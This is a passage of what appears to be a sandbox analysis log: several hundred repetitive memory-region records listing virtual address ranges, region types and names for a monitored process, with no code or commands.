0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19939 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19940 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19941 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19942 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19945 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19946 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19947 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19948 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19972 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 19973 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 19974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 19999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20004 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20005 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20009 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20010 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20011 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20012 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20013 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20014 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20017 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20018 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20022 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20023 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20024 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20025 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20026 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20027 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20028 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20029 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20030 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20031 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20032 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20033 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20034 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20035 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20036 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20037 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20038 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20039 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20040 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20041 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20042 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20049 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20062 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20063 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20064 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20065 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20087 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20088 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20089 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20090 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20091 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20092 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20093 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20094 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20095 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20096 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20097 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20098 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20099 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20100 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20101 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20102 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20103 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20104 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 